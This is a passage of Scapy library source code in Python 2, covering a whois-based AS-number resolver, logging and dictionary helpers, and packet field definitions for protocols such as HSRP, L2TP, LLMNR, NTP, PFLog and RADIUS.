 13 |         if server is not None:
 14 |             self.server = server
 15 |         self.port = port
 16 |         if options is not None:
 17 |             self.options = options
 18 |         
 19 |     def _start(self):
 20 |         self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 21 |         self.s.connect((self.server,self.port))
 22 |         if self.options:
 23 |             self.s.send(self.options+"\n")
 24 |             self.s.recv(8192)
 25 |     def _stop(self):
 26 |         self.s.close()
 27 |         
 28 |     def _parse_whois(self, txt):
 29 |         asn,desc = None,""
 30 |         for l in txt.splitlines():
 31 |             if not asn and l.startswith("origin:"):
 32 |                 asn = l[7:].strip()
 33 |             if l.startswith("descr:"):
 34 |                 if desc:
 35 |                     desc += r"\n"
 36 |                 desc += l[6:].strip()
 37 |             if asn is not None and desc:
 38 |                 break
 39 |         return asn,desc.strip()
 40 | 
 41 |     def _resolve_one(self, ip):
 42 |         self.s.send("%s\n" % ip)
 43 |         x = ""
 44 |         while not ("%" in x  or "source" in x):
 45 |             x += self.s.recv(8192)
 46 |         asn, desc = self._parse_whois(x)
 47 |         return ip,asn,desc
 48 |     def resolve(self, *ips):
 49 |         self._start()
 50 |         ret = []
 51 |         for ip in ips:
 52 |             ip,asn,desc = self._resolve_one(ip)
 53 |             if asn is not None:
 54 |                 ret.append((ip,asn,desc))
 55 |         self._stop()
 56 |         return ret
 57 | 
 58 | class AS_resolver_riswhois(AS_resolver):
 59 |     server = "riswhois.ripe.net"
 60 |     options = "-k -M -1"
 61 | 
 62 | 
 63 | class AS_resolver_radb(AS_resolver):
 64 |     server = "whois.ra.net"
 65 |     options = "-k -M"
 66 |     
 67 | 
 68 | class AS_resolver_cymru(AS_resolver):
 69 |     server = "whois.cymru.com"
 70 |     options = None
 71 |     def resolve(self, *ips):
 72 |         ASNlist = []
 73 |         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 74 |         s.connect((self.server,self.port))
 75 |         s.send("begin\r\n"+"\r\n".join(ips)+"\r\nend\r\n")
 76 |         r = ""
 77 |         while 1:
 78 |             l = s.recv(8192)
 79 |             if l == "":
 80 |                 break
 81 |             r += l
 82 |         s.close()
 83 |         for l in r.splitlines()[1:]:
 84 |             if "|" not in l:
 85 |                 continue
 86 |             asn,ip,desc = map(str.strip, l.split("|"))
 87 |             if asn == "NA":
 88 |                 continue
 89 |             asn = int(asn)
 90 |             ASNlist.append((ip,asn,desc))
 91 |         return ASNlist
 92 | 
 93 | class AS_resolver_multi(AS_resolver):
 94 |     resolvers_list = ( AS_resolver_cymru(),AS_resolver_riswhois(),AS_resolver_radb() )
 95 |     def __init__(self, *reslist):
 96 |         if reslist:
 97 |             self.resolvers_list = reslist
 98 |     def resolve(self, *ips):
 99 |         todo = ips
100 |         ret = []
101 |         for ASres in self.resolvers_list:
102 |             res = ASres.resolve(*todo)
103 |             resolved = [ ip for ip,asn,desc in res ]
104 |             todo = [ ip for ip in todo if ip not in resolved ]
105 |             ret += res
106 |         return ret
107 | 
108 | 
109 | conf.AS_resolver = AS_resolver_multi()
110 | 


--------------------------------------------------------------------------------
/src/lib/scapy/asn1/__init__.py:
--------------------------------------------------------------------------------
1 | ## This file is part of Scapy
2 | ## See http://www.secdev.org/projects/scapy for more informations
3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
4 | ## This program is published under a GPLv2 license
5 | 
6 | # We do not import mib.py because it is more bound to scapy and
7 | # less prone to be used in a standalone fashion
8 | __all__ = ["asn1","ber"]
9 | 


--------------------------------------------------------------------------------
/src/lib/scapy/asn1packet.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from packet import *
 7 | 
 8 | class ASN1_Packet(Packet):
 9 |     ASN1_root = None
10 |     ASN1_codec = None    
11 |     def init_fields(self):
12 |         flist = self.ASN1_root.get_fields_list()
13 |         self.do_init_fields(flist)
14 |         self.fields_desc = flist    
15 |     def do_build(self):
16 |         return self.ASN1_root.build(self)    
17 |     def do_dissect(self, x):
18 |         return self.ASN1_root.dissect(self, x)
19 |         
20 | 
21 | 


--------------------------------------------------------------------------------
/src/lib/scapy/crypto/__init__.py:
--------------------------------------------------------------------------------
1 | ## This file is part of Scapy
2 | ## See http://www.secdev.org/projects/scapy for more informations
3 | ## Copyright (C) Arnaud Ebalard <arno@natisbad.org>
4 | ## This program is published under a GPLv2 license
5 | 
6 | __all__ = ["cert"]
7 | 


--------------------------------------------------------------------------------
/src/lib/scapy/dadict.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from error import Scapy_Exception
 7 | 
 8 | ###############################
 9 | ## Direct Access dictionnary ##
10 | ###############################
11 | 
12 | def fixname(x):
13 |     if x and x[0] in "0123456789":
14 |         x = "n_"+x
15 |     return x.translate("________________________________________________0123456789_______ABCDEFGHIJKLMNOPQRSTUVWXYZ______abcdefghijklmnopqrstuvwxyz_____________________________________________________________________________________________________________________________________")
16 | 
17 | 
18 | class DADict_Exception(Scapy_Exception):
19 |     pass
20 | 
21 | class DADict:
22 |     def __init__(self, _name="DADict", **kargs):
23 |         self._name=_name
24 |         self.__dict__.update(kargs)
25 |     def fixname(self,val):
26 |         return fixname(val)
27 |     def __contains__(self, val):
28 |         return val in self.__dict__
29 |     def __getitem__(self, attr):
30 |         return getattr(self, attr)
31 |     def __setitem__(self, attr, val):        
32 |         return setattr(self, self.fixname(attr), val)
33 |     def __iter__(self):
34 |         return iter(map(lambda (x,y):y,filter(lambda (x,y):x and x[0]!="_", self.__dict__.items())))
35 |     def _show(self):
36 |         for k in self.__dict__.keys():
37 |             if k and k[0] != "_":
38 |                 print "%10s = %r" % (k,getattr(self,k))
39 |     def __repr__(self):
40 |         return "<%s/ %s>" % (self._name," ".join(filter(lambda x:x and x[0]!="_",self.__dict__.keys())))
41 | 
42 |     def _branch(self, br, uniq=0):
43 |         if uniq and br._name in self:
44 |             raise DADict_Exception("DADict: [%s] already branched in [%s]" % (br._name, self._name))
45 |         self[br._name] = br
46 | 
47 |     def _my_find(self, *args, **kargs):
48 |         if args and self._name not in args:
49 |             return False
50 |         for k in kargs:
51 |             if k not in self or self[k] != kargs[k]:
52 |                 return False
53 |         return True
54 |     
55 |     def _find(self, *args, **kargs):
56 |          return self._recurs_find((), *args, **kargs)
57 |     def _recurs_find(self, path, *args, **kargs):
58 |         if self in path:
59 |             return None
60 |         if self._my_find(*args, **kargs):
61 |             return self
62 |         for o in self:
63 |             if isinstance(o, DADict):
64 |                 p = o._recurs_find(path+(self,), *args, **kargs)
65 |                 if p is not None:
66 |                     return p
67 |         return None
68 |     def _find_all(self, *args, **kargs):
69 |         return self._recurs_find_all((), *args, **kargs)
70 |     def _recurs_find_all(self, path, *args, **kargs):
71 |         r = []
72 |         if self in path:
73 |             return r
74 |         if self._my_find(*args, **kargs):
75 |             r.append(self)
76 |         for o in self:
77 |             if isinstance(o, DADict):
78 |                 p = o._recurs_find_all(path+(self,), *args, **kargs)
79 |                 r += p
80 |         return r
81 |     def keys(self):
82 |         return filter(lambda x:x and x[0]!="_", self.__dict__.keys())
83 |         
84 | 


--------------------------------------------------------------------------------
/src/lib/scapy/error.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | #############################
 8 | ##### Logging subsystem #####
 9 | #############################
10 | 
11 | class Scapy_Exception(Exception):
12 |     pass
13 | 
14 | import logging,traceback,time
15 | 
16 | class ScapyFreqFilter(logging.Filter):
17 |     def __init__(self):
18 |         logging.Filter.__init__(self)
19 |         self.warning_table = {}
20 |     def filter(self, record):        
21 |         from config import conf
22 |         wt = conf.warning_threshold
23 |         if wt > 0:
24 |             stk = traceback.extract_stack()
25 |             caller=None
26 |             for f,l,n,c in stk:
27 |                 if n == 'warning':
28 |                     break
29 |                 caller = l
30 |             tm,nb = self.warning_table.get(caller, (0,0))
31 |             ltm = time.time()
32 |             if ltm-tm > wt:
33 |                 tm = ltm
34 |                 nb = 0
35 |             else:
36 |                 if nb < 2:
37 |                     nb += 1
38 |                     if nb == 2:
39 |                         record.msg = "more "+record.msg
40 |                 else:
41 |                     return 0
42 |             self.warning_table[caller] = (tm,nb)
43 |         return 1    
44 | 
45 | log_scapy = logging.getLogger("scapy")
46 | console_handler = logging.StreamHandler()
47 | console_handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s"))
48 | log_scapy.addHandler(console_handler)
49 | log_runtime = logging.getLogger("scapy.runtime")          # logs at runtime
50 | log_runtime.addFilter(ScapyFreqFilter())
51 | log_interactive = logging.getLogger("scapy.interactive")  # logs in interactive functions
52 | log_loading = logging.getLogger("scapy.loading")          # logs when loading scapy
53 | 
54 | 
55 | def warning(x):
56 |     log_runtime.warning(x)
57 | 
58 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/__init__.py:
--------------------------------------------------------------------------------
1 | ## This file is part of Scapy
2 | ## See http://www.secdev.org/projects/scapy for more informations
3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
4 | ## This program is published under a GPLv2 license
5 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/all.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.config import conf
 7 | from scapy.error import log_loading
 8 | 
 9 | def _import_star(m):
10 |     mod = __import__(m, globals(), locals())
11 |     for k,v in mod.__dict__.iteritems():
12 |         globals()[k] = v
13 | 
14 | for _l in conf.load_layers:
15 |     log_loading.debug("Loading layer %s" % _l)
16 |     _import_star(_l)
17 | 
18 | 
19 | 
20 | 
21 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/gprs.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | 
 7 | from scapy.fields import *
 8 | from scapy.packet import *
 9 | from scapy.layers.inet import IP
10 | 
11 | class GPRS(Packet):
12 |     name = "GPRSdummy"
13 |     fields_desc = [
14 |         StrStopField("dummy","","\x65\x00\x00",1)
15 |         ]
16 | 
17 | 
18 | bind_layers( GPRS,          IP,            )
19 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/hsrp.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.fields import *
 7 | from scapy.packet import *
 8 | from scapy.layers.inet import UDP
 9 | 
10 | class HSRP(Packet):
11 |     name = "HSRP"
12 |     fields_desc = [
13 |         ByteField("version", 0),
14 |         ByteEnumField("opcode", 0, { 0:"Hello"}),
15 |         ByteEnumField("state", 16, { 16:"Active"}),
16 |         ByteField("hellotime", 3),
17 |         ByteField("holdtime", 10),
18 |         ByteField("priority", 120),
19 |         ByteField("group", 1),
20 |         ByteField("reserved", 0),
21 |         StrFixedLenField("auth","cisco",8),
22 |         IPField("virtualIP","192.168.1.1") ]
23 |         
24 | 
25 | 
26 |         
27 |         
28 | bind_layers( UDP,           HSRP,          dport=1985, sport=1985)
29 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/ir.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.packet import *
 7 | from scapy.fields import *
 8 | from scapy.layers.l2 import CookedLinux
 9 | 
10 | 
11 | 
12 | # IR
13 | 
14 | class IrLAPHead(Packet):
15 |     name = "IrDA Link Access Protocol Header"
16 |     fields_desc = [ XBitField("Address", 0x7f, 7),
17 |                     BitEnumField("Type", 1, 1, {"Response":0,
18 |                                                 "Command":1})]
19 | 
20 | class IrLAPCommand(Packet):
21 |     name = "IrDA Link Access Protocol Command"
22 |     fields_desc = [ XByteField("Control", 0),
23 |                     XByteField("Format identifier", 0),
24 |                     XIntField("Source address", 0),
25 |                     XIntField("Destination address", 0xffffffffL),
26 |                     XByteField("Discovery flags", 0x1),
27 |                     ByteEnumField("Slot number", 255, {"final":255}),
28 |                     XByteField("Version", 0)]
29 | 
30 | 
31 | class IrLMP(Packet):
32 |     name = "IrDA Link Management Protocol"
33 |     fields_desc = [ XShortField("Service hints", 0),
34 |                     XByteField("Character set", 0),
35 |                     StrField("Device name", "") ]
36 | 
37 | 
38 | bind_layers( CookedLinux,   IrLAPHead,     proto=23)
39 | bind_layers( IrLAPHead,     IrLAPCommand,  Type=1)
40 | bind_layers( IrLAPCommand,  IrLMP,         )
41 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/l2tp.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | import struct
 7 | 
 8 | from scapy.packet import *
 9 | from scapy.fields import *
10 | from scapy.layers.inet import UDP
11 | from scapy.layers.ppp import PPP
12 | 
13 | class L2TP(Packet):
14 |     fields_desc = [ ShortEnumField("pkt_type",2,{2:"data"}),
15 |                     ShortField("len", None),
16 |                     ShortField("tunnel_id", 0),
17 |                     ShortField("session_id", 0),
18 |                     ShortField("ns", 0),
19 |                     ShortField("nr", 0),
20 |                     ShortField("offset", 0) ]
21 | 
22 |     def post_build(self, pkt, pay):
23 |         if self.len is None:
24 |             l = len(pkt)+len(pay)
25 |             pkt = pkt[:2]+struct.pack("!H", l)+pkt[4:]
26 |         return pkt+pay
27 | 
28 | 
29 | bind_layers( UDP,           L2TP,          sport=1701, dport=1701)
30 | bind_layers( L2TP,          PPP,           )
31 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/llmnr.py:
--------------------------------------------------------------------------------
 1 | from scapy.fields import *
 2 | from scapy.packet import *
 3 | from scapy.layers.inet import UDP
 4 | from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField
 5 | 
 6 | 
 7 | #############################################################################
 8 | ###                           LLMNR (RFC4795)                             ###
 9 | #############################################################################
10 | # LLMNR is based on the DNS packet format (RFC1035 Section 4)
11 | # RFC also envisions LLMNR over TCP. Like vista, we don't support it -- arno
12 | 
13 | _LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3"
14 | _LLMNR_IPv4_mcast_addr = "224.0.0.252"
15 | 
16 | class LLMNRQuery(Packet):
17 |     name = "Link Local Multicast Node Resolution - Query"
18 |     fields_desc = [ ShortField("id", 0),
19 |                     BitField("qr", 0, 1),
20 |                     BitEnumField("opcode", 0, 4, { 0:"QUERY" }),
21 |                     BitField("c", 0, 1),
22 |                     BitField("tc", 0, 2),
23 |                     BitField("z", 0, 4),
24 |                     BitEnumField("rcode", 0, 4, { 0:"ok" }),
25 |                     DNSRRCountField("qdcount", None, "qd"),
26 |                     DNSRRCountField("ancount", None, "an"),
27 |                     DNSRRCountField("nscount", None, "ns"),
28 |                     DNSRRCountField("arcount", None, "ar"),
29 |                     DNSQRField("qd", "qdcount"),
30 |                     DNSRRField("an", "ancount"),
31 |                     DNSRRField("ns", "nscount"),
32 |                     DNSRRField("ar", "arcount",0)]
33 |     overload_fields = {UDP: {"sport": 5355, "dport": 5355 }}
34 |     def hashret(self):
35 |         return struct.pack("!H", self.id)
36 | 
37 | class LLMNRResponse(LLMNRQuery):
38 |     name = "Link Local Multicast Node Resolution - Response"
39 |     qr = 1
40 |     fields_desc = []
41 | 
42 |     def answers(self, other):
43 |         return (isinstance(other, LLMNRQuery) and
44 |                 self.id == other.id and
45 |                 self.qr == 1 and
46 |                 other.qr == 0)
47 | 
48 | def _llmnr_dispatcher(x, *args, **kargs):
49 |     cls = Raw
50 |     if len(x) >= 3:
51 |         if (ord(x[4]) & 0x80): # Response
52 |             cls = LLMNRResponse
53 |         else:                  # Query
54 |             cls = LLMNRQuery
55 |     return cls(x, *args, **kargs)
56 | 
57 | bind_bottom_up(UDP, _llmnr_dispatcher, { "dport": 5355 })
58 | bind_bottom_up(UDP, _llmnr_dispatcher, { "sport": 5355 })
59 | 
60 | # LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista.")))
61 | 
62 | 
63 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/mgcp.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.packet import *
 7 | from scapy.fields import *
 8 | from scapy.layers.inet import UDP
 9 | 
10 | class MGCP(Packet):
11 |     name = "MGCP"
12 |     longname = "Media Gateway Control Protocol"
13 |     fields_desc = [ StrStopField("verb","AUEP"," ", -1),
14 |                     StrFixedLenField("sep1"," ",1),
15 |                     StrStopField("transaction_id","1234567"," ", -1),
16 |                     StrFixedLenField("sep2"," ",1),
17 |                     StrStopField("endpoint","dummy@dummy.net"," ", -1),
18 |                     StrFixedLenField("sep3"," ",1),
19 |                     StrStopField("version","MGCP 1.0 NCS 1.0","\x0a", -1),
20 |                     StrFixedLenField("sep4","\x0a",1),
21 |                     ]
22 |                     
23 |     
24 | #class MGCP(Packet):
25 | #    name = "MGCP"
26 | #    longname = "Media Gateway Control Protocol"
27 | #    fields_desc = [ ByteEnumField("type",0, ["request","response","others"]),
28 | #                    ByteField("code0",0),
29 | #                    ByteField("code1",0),
30 | #                    ByteField("code2",0),
31 | #                    ByteField("code3",0),
32 | #                    ByteField("code4",0),
33 | #                    IntField("trasid",0),
34 | #                    IntField("req_time",0),
35 | #                    ByteField("is_duplicate",0),
36 | #                    ByteField("req_available",0) ]
37 | #
38 | bind_layers( UDP,           MGCP,          dport=2727)
39 | bind_layers( UDP,           MGCP,          sport=2727)
40 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/mobileip.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.fields import *
 7 | from scapy.packet import *
 8 | from scapy.layers.inet import IP,UDP
 9 | 
10 | 
11 | class MobileIP(Packet):
12 |     name = "Mobile IP (RFC3344)"
13 |     fields_desc = [ ByteEnumField("type", 1, {1:"RRQ", 3:"RRP"}) ]
14 | 
15 | class MobileIPRRQ(Packet):
16 |     name = "Mobile IP Registration Request (RFC3344)"
17 |     fields_desc = [ XByteField("flags", 0),
18 |                     ShortField("lifetime", 180),
19 |                     IPField("homeaddr", "0.0.0.0"),
20 |                     IPField("haaddr", "0.0.0.0"),
21 |                     IPField("coaddr", "0.0.0.0"),
22 |                     LongField("id", 0), ]
23 | 
24 | class MobileIPRRP(Packet):
25 |     name = "Mobile IP Registration Reply (RFC3344)"
26 |     fields_desc = [ ByteField("code", 0),
27 |                     ShortField("lifetime", 180),
28 |                     IPField("homeaddr", "0.0.0.0"),
29 |                     IPField("haaddr", "0.0.0.0"),
30 |                     LongField("id", 0), ]
31 | 
32 | class MobileIPTunnelData(Packet):
33 |     name = "Mobile IP Tunnel Data Message (RFC3519)"
34 |     fields_desc = [ ByteField("nexthdr", 4),
35 |                     ShortField("res", 0) ]
36 | 
37 | 
38 | bind_layers( UDP,           MobileIP,           sport=434)
39 | bind_layers( UDP,           MobileIP,           dport=434)
40 | bind_layers( MobileIP,      MobileIPRRQ,        type=1)
41 | bind_layers( MobileIP,      MobileIPRRP,        type=3)
42 | bind_layers( MobileIP,      MobileIPTunnelData, type=4)
43 | bind_layers( MobileIPTunnelData, IP,           nexthdr=4)
44 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/netflow.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.fields import *
 7 | from scapy.packet import *
 8 | 
 9 | # Cisco Netflow Protocol version 1
10 | class NetflowHeader(Packet):
11 |     name = "Netflow Header"
12 |     fields_desc = [ ShortField("version", 1) ]
13 |     
14 | class NetflowHeaderV1(Packet):
15 |     name = "Netflow Header V1"
16 |     fields_desc = [ ShortField("count", 0),
17 |                     IntField("sysUptime", 0),
18 |                     IntField("unixSecs", 0),
19 |                     IntField("unixNanoSeconds", 0) ]
20 | 
21 | 
22 | class NetflowRecordV1(Packet):
23 |     name = "Netflow Record"
24 |     fields_desc = [ IPField("ipsrc", "0.0.0.0"),
25 |                     IPField("ipdst", "0.0.0.0"),
26 |                     IPField("nexthop", "0.0.0.0"),
27 |                     ShortField("inputIfIndex", 0),
28 |                     ShortField("outpuIfIndex", 0),
29 |                     IntField("dpkts", 0),
30 |                     IntField("dbytes", 0),
31 |                     IntField("starttime", 0),
32 |                     IntField("endtime", 0),
33 |                     ShortField("srcport", 0),
34 |                     ShortField("dstport", 0),
35 |                     ShortField("padding", 0),
36 |                     ByteField("proto", 0),
37 |                     ByteField("tos", 0),
38 |                     IntField("padding1", 0),
39 |                     IntField("padding2", 0) ]
40 | 
41 | 
42 | bind_layers( NetflowHeader,   NetflowHeaderV1, version=1)
43 | bind_layers( NetflowHeaderV1, NetflowRecordV1, )
44 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/ntp.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | import time
 7 | from scapy.packet import *
 8 | from scapy.fields import *
 9 | from scapy.layers.inet import UDP
10 | 
11 | 
12 | # seconds between 01-01-1900 and 01-01-1970
13 | _NTP_BASETIME = 2208988800
14 | 
15 | class TimeStampField(FixedPointField):
16 |     def __init__(self, name, default):
17 |         FixedPointField.__init__(self, name, default, 64, 32)
18 | 
19 |     def i2repr(self, pkt, val):
20 |         if val is None:
21 |             return "--"
22 |         val = self.i2h(pkt,val)
23 |         if val < _NTP_BASETIME:
24 |             return val
25 |         return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val-_NTP_BASETIME))
26 | 
27 |     def any2i(self, pkt, val):
28 |         if type(val) is str:
29 |             return int(time.mktime(time.strptime(val))) + _NTP_BASETIME + 3600 # XXX
30 |         return FixedPointField.any2i(self,pkt,val)
31 |     
32 |     def i2m(self, pkt, val):
33 |         if val is None:
34 |             val = FixedPointField.any2i(self, pkt, time.time()+_NTP_BASETIME)
35 |         return FixedPointField.i2m(self, pkt, val)
36 |         
37 | 
38 | 
39 | class NTP(Packet):
40 |     # RFC 1769
41 |     name = "NTP"
42 |     fields_desc = [ 
43 |          BitEnumField('leap', 0, 2,
44 |                       { 0: 'nowarning',
45 |                         1: 'longminute',
46 |                         2: 'shortminute',
47 |                         3: 'notsync'}),
48 |          BitField('version', 3, 3),
49 |          BitEnumField('mode', 3, 3,
50 |                       { 0: 'reserved',
51 |                         1: 'sym_active',
52 |                         2: 'sym_passive',
53 |                         3: 'client',
54 |                         4: 'server',
55 |                         5: 'broadcast',
56 |                         6: 'control',
57 |                         7: 'private'}),
58 |          BitField('stratum', 2, 8),
59 |          BitField('poll', 0xa, 8),          ### XXX : it's a signed int
60 |          BitField('precision', 0, 8),       ### XXX : it's a signed int
61 |          FixedPointField('delay', 0, size=32, frac_bits=16),
62 |          FixedPointField('dispersion', 0, size=32, frac_bits=16),
63 |          IPField('id', "127.0.0.1"),
64 |          TimeStampField('ref', 0),
65 |          TimeStampField('orig', None),  # None means current time
66 |          TimeStampField('recv', 0),
67 |          TimeStampField('sent', None) 
68 |          ]
69 |     def mysummary(self):
70 |         return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%")
71 | 
72 | 
73 | bind_layers( UDP,           NTP,           dport=123, sport=123)
74 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/pflog.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.packet import *
 7 | from scapy.fields import *
 8 | from scapy.layers.inet import IP
 9 | if conf.ipv6_enabled:
10 |     from scapy.layers.inet6 import IPv6
11 | from scapy.config import conf
12 | 
13 | class PFLog(Packet):
14 |     name = "PFLog"
15 |     # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h
16 |     fields_desc = [ ByteField("hdrlen", 0),
17 |                     ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4",
18 |                                                     socket.AF_INET6: "IPv6"}),
19 |                     ByteEnumField("action", 1, {0: "pass", 1: "drop",
20 |                                                 2: "scrub", 3: "no-scrub",
21 |                                                 4: "nat", 5: "no-nat",
22 |                                                 6: "binat", 7: "no-binat",
23 |                                                 8: "rdr", 9: "no-rdr",
24 |                                                 10: "syn-proxy-drop" }),
25 |                     ByteEnumField("reason", 0, {0: "match", 1: "bad-offset",
26 |                                                 2: "fragment", 3: "short",
27 |                                                 4: "normalize", 5: "memory",
28 |                                                 6: "bad-timestamp",
29 |                                                 7: "congestion",
30 |                                                 8: "ip-options",
31 |                                                 9: "proto-cksum",
32 |                                                 10: "state-mismatch",
33 |                                                 11: "state-insert",
34 |                                                 12: "state-limit",
35 |                                                 13: "src-limit",
36 |                                                 14: "syn-proxy" }),
37 |                     StrFixedLenField("iface", "", 16),
38 |                     StrFixedLenField("ruleset", "", 16),
39 |                     SignedIntField("rulenumber", 0),
40 |                     SignedIntField("subrulenumber", 0),
41 |                     SignedIntField("uid", 0),
42 |                     IntField("pid", 0),
43 |                     SignedIntField("ruleuid", 0),
44 |                     IntField("rulepid", 0),
45 |                     ByteEnumField("direction", 255, {0: "inout", 1: "in",
46 |                                                      2:"out", 255: "unknown"}),
47 |                     StrFixedLenField("pad", "\x00\x00\x00", 3 ) ]
48 |     def mysummary(self):
49 |         return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%")
50 | 
51 | bind_layers(PFLog, IP, addrfamily=socket.AF_INET)
52 | if conf.ipv6_enabled:
53 |     bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6)
54 | 
55 | conf.l2types.register(117, PFLog)
56 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/radius.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | import struct
 7 | from scapy.packet import *
 8 | from scapy.fields import *
 9 | 
10 | class Radius(Packet):
11 |     name = "Radius"
12 |     fields_desc = [ ByteEnumField("code", 1, {1: "Access-Request",
13 |                                               2: "Access-Accept",
14 |                                               3: "Access-Reject",
15 |                                               4: "Accounting-Request",
16 |                                               5: "Accounting-Accept",
17 |                                               6: "Accounting-Status",
18 |                                               7: "Password-Request",
19 |                                               8: "Password-Ack",
20 |                                               9: "Password-Reject",
21 |                                               10: "Accounting-Message",
22 |                                               11: "Access-Challenge",
23 |                                               12: "Status-Server",
24 |                                               13: "Status-Client",
25 |                                               21: "Resource-Free-Request",
26 |                                               22: "Resource-Free-Response",
27 |                                               23: "Resource-Query-Request",
28 |                                               24: "Resource-Query-Response",
29 |                                               25: "Alternate-Resource-Reclaim-Request",
30 |                                               26: "NAS-Reboot-Request",
31 |                                               27: "NAS-Reboot-Response",
32 |                                               29: "Next-Passcode",
33 |                                               30: "New-Pin",
34 |                                               31: "Terminate-Session",
35 |                                               32: "Password-Expired",
36 |                                               33: "Event-Request",
37 |                                               34: "Event-Response",
38 |                                               40: "Disconnect-Request",
39 |                                               41: "Disconnect-ACK",
40 |                                               42: "Disconnect-NAK",
41 |                                               43: "CoA-Request",
42 |                                               44: "CoA-ACK",
43 |                                               45: "CoA-NAK",
44 |                                               50: "IP-Address-Allocate",
45 |                                               51: "IP-Address-Release",
46 |                                               253: "Experimental-use",
47 |                                               254: "Reserved",
48 |                                               255: "Reserved"} ),
49 |                     ByteField("id", 0),
50 |                     ShortField("len", None),
51 |                     StrFixedLenField("authenticator","",16) ]
52 |     def post_build(self, p, pay):
53 |         p += pay
54 |         l = self.len
55 |         if l is None:
56 |             l = len(p)
57 |             p = p[:2]+struct.pack("!H",l)+p[4:]
58 |         return p
59 | 
60 | 
61 | 
62 | 


--------------------------------------------------------------------------------
/src/lib/scapy/layers/rip.py:
--------------------------------------------------------------------------------
 1 | ## This file is part of Scapy
 2 | ## See http://www.secdev.org/projects/scapy for more informations
 3 | ## Copyright (C) Philippe Biondi <phil@secdev.org>
 4 | ## This program is published under a GPLv2 license
 5 | 
 6 | from scapy.packet import *
 7 | from scapy.fields import *
 8 | from scapy.layers.inet import UDP
